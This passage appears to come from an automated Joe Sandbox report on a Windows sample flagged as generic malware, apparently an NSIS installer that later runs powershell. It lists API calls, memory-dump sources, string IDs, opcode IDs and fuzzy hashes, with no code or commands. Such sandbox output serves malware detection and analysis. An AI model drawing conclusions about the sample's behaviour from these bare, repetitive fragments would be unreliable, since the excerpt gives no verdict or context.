                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                        • String ID:
                                                                        • API String ID: 2102729457-0
                                                                        • Opcode ID: 5b1e02df2a5da4039d6b12178acb40621d70ebca526a36ee1d8f5fcc3c5ae34a
                                                                        • Instruction ID: d6c9869078f7173a9f6fd6f2732e3e3a433b8c8c07e8cf938b477ca654505681
                                                                        • Opcode Fuzzy Hash: 5b1e02df2a5da4039d6b12178acb40621d70ebca526a36ee1d8f5fcc3c5ae34a
                                                                        • Instruction Fuzzy Hash: 30F05E30645620ABC6317BA0FE8C99B7B64A704B12BA1043AF101F22E4CA7408878BED
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                          • Part of subcall function 00406257: lstrcpynA.KERNEL32(0000000B,0000000B,00000400,00403556,Drivelingly Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406264
                                                                          • Part of subcall function 00405C82: CharNextA.USER32(?,?,0042BC98,0000000B,00405CEE,0042BC98,0042BC98,774D3410,?,C:\Users\user\AppData\Local\Temp\,00405A39,?,774D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe"), ref: 00405C90
                                                                          • Part of subcall function 00405C82: CharNextA.USER32(00000000), ref: 00405C95
                                                                          • Part of subcall function 00405C82: CharNextA.USER32(00000000), ref: 00405CA9
                                                                        • lstrlenA.KERNEL32(0042BC98,00000000,0042BC98,0042BC98,774D3410,?,C:\Users\user\AppData\Local\Temp\,00405A39,?,774D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe"), ref: 00405D2A
                                                                        • GetFileAttributesA.KERNEL32(0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,00000000,0042BC98,0042BC98,774D3410,?,C:\Users\user\AppData\Local\Temp\,00405A39,?,774D3410,C:\Users\user\AppData\Local\Temp\), ref: 00405D3A
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CD7
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 3248276644-2145255484
                                                                        • Opcode ID: 29467e021e5a5cbfdb50d3ef3054caf9b3e4a2c2be32e2e0e67c19f10da5a835
                                                                        • Instruction ID: 961b8afdf15cf8a693d93a37420b81600cf3221e3748574004b2986df105c153
                                                                        • Opcode Fuzzy Hash: 29467e021e5a5cbfdb50d3ef3054caf9b3e4a2c2be32e2e0e67c19f10da5a835
                                                                        • Instruction Fuzzy Hash: 01F02D25108E6526E62632391D09AAF0645CD93324759453FFCA2762C1DB3C89439E6D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • IsWindowVisible.USER32(?), ref: 0040531B
                                                                        • CallWindowProcA.USER32(?,?,?,?), ref: 0040536C
                                                                          • Part of subcall function 00404320: SendMessageA.USER32(0001047E,00000000,00000000,00000000), ref: 00404332
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                        • String ID:
                                                                        • API String ID: 3748168415-3916222277
                                                                        • Opcode ID: 2bda5d118e415af4fa0da154639cfdb284582745e0818f00f9dac7c2683be084
                                                                        • Instruction ID: 088eb893e58e7befb787ec48b20f4cc5058787dea00b391af27f8784c6c771c5
                                                                        • Opcode Fuzzy Hash: 2bda5d118e415af4fa0da154639cfdb284582745e0818f00f9dac7c2683be084
                                                                        • Instruction Fuzzy Hash: 59017172204608ABEF206F11DD81A9B3769EB84395F541037FF05761D0C7BA8D629E2A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,ExecToStack,?,?,?,?,00000002,ExecToStack,?,004063F6,80000002), ref: 00406184
                                                                        • RegCloseKey.ADVAPI32(?,?,004063F6,80000002,Software\Microsoft\Windows\CurrentVersion,ExecToStack,ExecToStack,ExecToStack,?,Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll), ref: 0040618F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CloseQueryValue
                                                                        • String ID: ExecToStack
                                                                        • API String ID: 3356406503-166031814
                                                                        • Opcode ID: 67b3a0d9edfe76234a1cdcd6902d77da2c7b9a6b027d006c214c8ae7186da0ab
                                                                        • Instruction ID: 76517841fcd29efece62e5e1a2c360dd076a242d2a9727e46a6747b1579fdab2
                                                                        • Opcode Fuzzy Hash: 67b3a0d9edfe76234a1cdcd6902d77da2c7b9a6b027d006c214c8ae7186da0ab
                                                                        • Instruction Fuzzy Hash: 8F017C72500209ABDF22CF61CC09FDB3FACEF55364F05803AF956A6192D278D964DBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CharNextExA.USER32(?,00000000,00000000,00000400,?,6EAC1708,?,00000002,00000002,00000000), ref: 6EAC17B0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1379662989.000000006EAC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EAC0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1379640466.000000006EAC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1379684801.000000006EAC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1379750126.000000006EAC3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1379781257.000000006EAC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6eac0000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CharNext
                                                                        • String ID: $
                                                                        • API String ID: 3213498283-227171996
                                                                        • Opcode ID: 293de5a9b3ad47ee5f2d58b045d702fdeddde8b7cb0d3d96b7769455f5d68e84
                                                                        • Instruction ID: eba2d7f532e5e254b2aa942b9b09601b4349b3c6540b1f41e3df42d7a6d97516
                                                                        • Opcode Fuzzy Hash: 293de5a9b3ad47ee5f2d58b045d702fdeddde8b7cb0d3d96b7769455f5d68e84
                                                                        • Instruction Fuzzy Hash: 34F0A7311083CA9ADF01CF54CC28BEB3FA56F11640F040448FD804B282C771D96AC7E5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • FreeLibrary.KERNEL32(?,774D3410,00000000,C:\Users\user\AppData\Local\Temp\,00403980,0040379A,?,?,00000007,00000009,0000000B), ref: 004039C2
                                                                        • GlobalFree.KERNEL32(?), ref: 004039C9
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004039A8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Free$GlobalLibrary
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 1100898210-2145255484
                                                                        • Opcode ID: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                                        • Instruction ID: 4fd9126d001fd6f9661ff5a064fa74b3c5ec8a5f3f5490ff4f649df82ed95c92
                                                                        • Opcode Fuzzy Hash: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                                        • Instruction Fuzzy Hash: C5E0EC3261112057C7616F55EA0476AB7A86F49B66F0A006EE8847B2A08BB85C468BD8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F78,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe,80000000,00000003,?,?,004036FD,?,?,00000007,00000009), ref: 00405C36
                                                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F78,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe,80000000,00000003,?,?,004036FD,?), ref: 00405C44
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CharPrevlstrlen
                                                                        • String ID: C:\Users\user\Desktop
                                                                        • API String ID: 2709904686-3080008178
                                                                        • Opcode ID: 46bbde6159133eac16457addd6c3fa88623ef59ff022f94c34d6ba2180d3974b
                                                                        • Instruction ID: 122f4ef1c51afe0287f8aef094741ea3ea5c8e0f1b3bdfc6c9647d6fbcc18736
                                                                        • Opcode Fuzzy Hash: 46bbde6159133eac16457addd6c3fa88623ef59ff022f94c34d6ba2180d3974b
                                                                        • Instruction Fuzzy Hash: 75D0A76240CA746EF30362108D00B9F6A88DF13340F0A04E6F081A2190C2784C424BFD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5F
                                                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D77
                                                                        • CharNextA.USER32(00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D88
                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D91
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 190613189-0
                                                                        • Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                                        • Instruction ID: 87b880d6ec66590321046a57115c6c0db4d123b3cd257c49f1686e195a850605
                                                                        • Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                                        • Instruction Fuzzy Hash: 0DF0F632200814FFCB02DFA4DD44D9FBBA8EF55350B2580BAE840F7210D634DE019BA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(?,774CE800,00000000,00000000,?,?,6EAC1286,00000000,/TIMEOUT=,00000000), ref: 6EAC18C9
                                                                        • lstrcmpiA.KERNEL32(?,?), ref: 6EAC18E1
                                                                        • CharNextA.USER32(?,?,?,6EAC1286,00000000,/TIMEOUT=,00000000), ref: 6EAC18F2
                                                                        • lstrlenA.KERNEL32(?,?,?,6EAC1286,00000000,/TIMEOUT=,00000000), ref: 6EAC18FB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1379662989.000000006EAC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EAC0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1379640466.000000006EAC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1379684801.000000006EAC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1379750126.000000006EAC3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1379781257.000000006EAC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6eac0000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 190613189-0
                                                                        • Opcode ID: be0c9b63ea938a1a983106070db61ea63b4f05fa56a4a5cc9e62c1f4571052df
                                                                        • Instruction ID: 0849e6d77b66c7de085fafa22d210416f24ff49ea667db594c935f8b73286f9f
                                                                        • Opcode Fuzzy Hash: be0c9b63ea938a1a983106070db61ea63b4f05fa56a4a5cc9e62c1f4571052df
                                                                        • Instruction Fuzzy Hash: A0F02B35704A58FFCB02DFE9CC0499DBBB8DF06650B2680A5F800EB210D670DE01E7A6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2070559539.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: tLk$tLk$tLk$tLk$x.k$x.k$x.k$-k$-k
                                                                        • API String ID: 0-2064059810
                                                                        • Opcode ID: 3efa1e404867a554bb54a29e773cfc6dd08370669c9c0c63ee56c0e865682082
                                                                        • Instruction ID: e3d8b5071fe62188e1fe9f75e2b449a3c079226f8f1bf9b5f83182bf35f10292
                                                                        • Opcode Fuzzy Hash: 3efa1e404867a554bb54a29e773cfc6dd08370669c9c0c63ee56c0e865682082
                                                                        • Instruction Fuzzy Hash: F3F281B4A00318DFE724DB64C854B9AB7B2FF85318F1085A9D51AAB741CB71ED81CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2064493981.00000000033D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33d0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fe9fab0dfc400b2b1d9ea7e36ba32ee56eac96b0a2a45b16d53173ca2359fd88
                                                                        • Instruction ID: 95396be415ea54b9f8fca74ca09b4896459e415c0ad86ab62905b6acce93f42e
                                                                        • Opcode Fuzzy Hash: fe9fab0dfc400b2b1d9ea7e36ba32ee56eac96b0a2a45b16d53173ca2359fd88
                                                                        • Instruction Fuzzy Hash: 4BB14275E00219DFDB14CFA9E8C57DDBBF2BF88314F188129D816AB254EB749885CB81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2064493981.00000000033D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33d0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 80dd36e82129e132160af5f4003f9cbf905e1ba5367b62fad2cea8c888702e6d
                                                                        • Instruction ID: b69a9ccd34f56ef4b412612765fc31aad84b160390105e8fce9e5c9c72941a4a
                                                                        • Opcode Fuzzy Hash: 80dd36e82129e132160af5f4003f9cbf905e1ba5367b62fad2cea8c888702e6d
                                                                        • Instruction Fuzzy Hash: 09B15F72E002199FDB10CFA9E8D179DBBF2BF88714F188529D816EB354EB749845CB81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2070559539.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: tLk$tLk$x.k$x.k$-k$-k
                                                                        • API String ID: 0-344521456
                                                                        • Opcode ID: 672bc7c99fb30248f7171c8e2a6cff877fe765fa52961b89fcc857f23bc22850
                                                                        • Instruction ID: 785a1ae3a76c1f8063796cc3ced0c88e39832e218e28ddf2e9269c7e4503453f
                                                                        • Opcode Fuzzy Hash: 672bc7c99fb30248f7171c8e2a6cff877fe765fa52961b89fcc857f23bc22850
                                                                        • Instruction Fuzzy Hash: D9B2A374A003189FD734DB64C954B9AB7B2FF85318F1085A9D91AAB741CB31ED82CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2070559539.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: tLk$x.k$-k
                                                                        • API String ID: 0-3645065327
                                                                        • Opcode ID: af50594d9dc4e03bccebc3b85b2f1be2fa9c3be001630d9181fb7983f18d2fd8
                                                                        • Instruction ID: 557be88999c7a42bb3345e101d6400760ec41256dc5d2f2e7af979ead6eeb335
                                                                        • Opcode Fuzzy Hash: af50594d9dc4e03bccebc3b85b2f1be2fa9c3be001630d9181fb7983f18d2fd8
                                                                        • Instruction Fuzzy Hash: 7A72A3B4E00314DFE734DBA4C854B9AB7B2BB85304F1085AAD51AAB751CB71ED81CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2070559539.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: x.k$-k
                                                                        • API String ID: 0-766683181
                                                                        • Opcode ID: 975f96c082517997a38b247bca610ad361e4db1d4b7759ea5a839dc273dc6560
                                                                        • Instruction ID: 015e90e20a9d05a0c3fd470c28754e63c175f8509d347f5b27a752c2c2470ee4
                                                                        • Opcode Fuzzy Hash: 975f96c082517997a38b247bca610ad361e4db1d4b7759ea5a839dc273dc6560
                                                                        • Instruction Fuzzy Hash: A67293B4E00319CFE724DB94C854B9AB7B2BF85708F1085AAD519AB750CB71ED41CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2070559539.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: x.k$-k
                                                                        • API String ID: 0-766683181
                                                                        • Opcode ID: a92caa6d74b267d0e63d23d8b435a1017f2faceba3c535bbf873247df3c46f05
                                                                        • Instruction ID: b7dcbe8c125f0c088e98de19295a5fad51dd51fe08baa03a395714dcb0712e9b
                                                                        • Opcode Fuzzy Hash: a92caa6d74b267d0e63d23d8b435a1017f2faceba3c535bbf873247df3c46f05
                                                                        • Instruction Fuzzy Hash: A76291B4A00315CFDB34DB94C854B9AB7B2BB85308F10C5AAD519AB751CB71ED82CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2070559539.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: x.k$-k
                                                                        • API String ID: 0-766683181
                                                                        • Opcode ID: ea39216ca5b763abe25c4b12a9444a76d2b2d3911f585cffcf225a3c73a5cc95
                                                                        • Instruction ID: 38151110f6650b8b1f94e75987325c1ab5a1517fe8c7f375690709f310c09faa
                                                                        • Opcode Fuzzy Hash: ea39216ca5b763abe25c4b12a9444a76d2b2d3911f585cffcf225a3c73a5cc95
                                                                        • Instruction Fuzzy Hash: 7132A4B4E00314DFE734DB94C854B9AB7B2BB85304F1085AAD51AAB751CB71ED82CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2070559539.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: x.k$-k
                                                                        • API String ID: 0-766683181
                                                                        • Opcode ID: 95687cc07547b40421d783b9309398120ec5bfed8af5fc62bd60a505a2a62deb
                                                                        • Instruction ID: 5b17630500eb4fcdb4c9a8b559302ac544caf29c90bce5937d3616b554966b83
                                                                        • Opcode Fuzzy Hash: 95687cc07547b40421d783b9309398120ec5bfed8af5fc62bd60a505a2a62deb
                                                                        • Instruction Fuzzy Hash: 0B32A274A003189FD734DB64C954B9AB7B2BF85318F10C5A9D91AAB741CB31ED82CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2070559539.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: tLk$x.k
                                                                        • API String ID: 0-3601675571
                                                                        • Opcode ID: b3e4fa2c4621e9f1ecc8c7ca82df321938d3ad37eb53efa28bd433cac68a7cd4
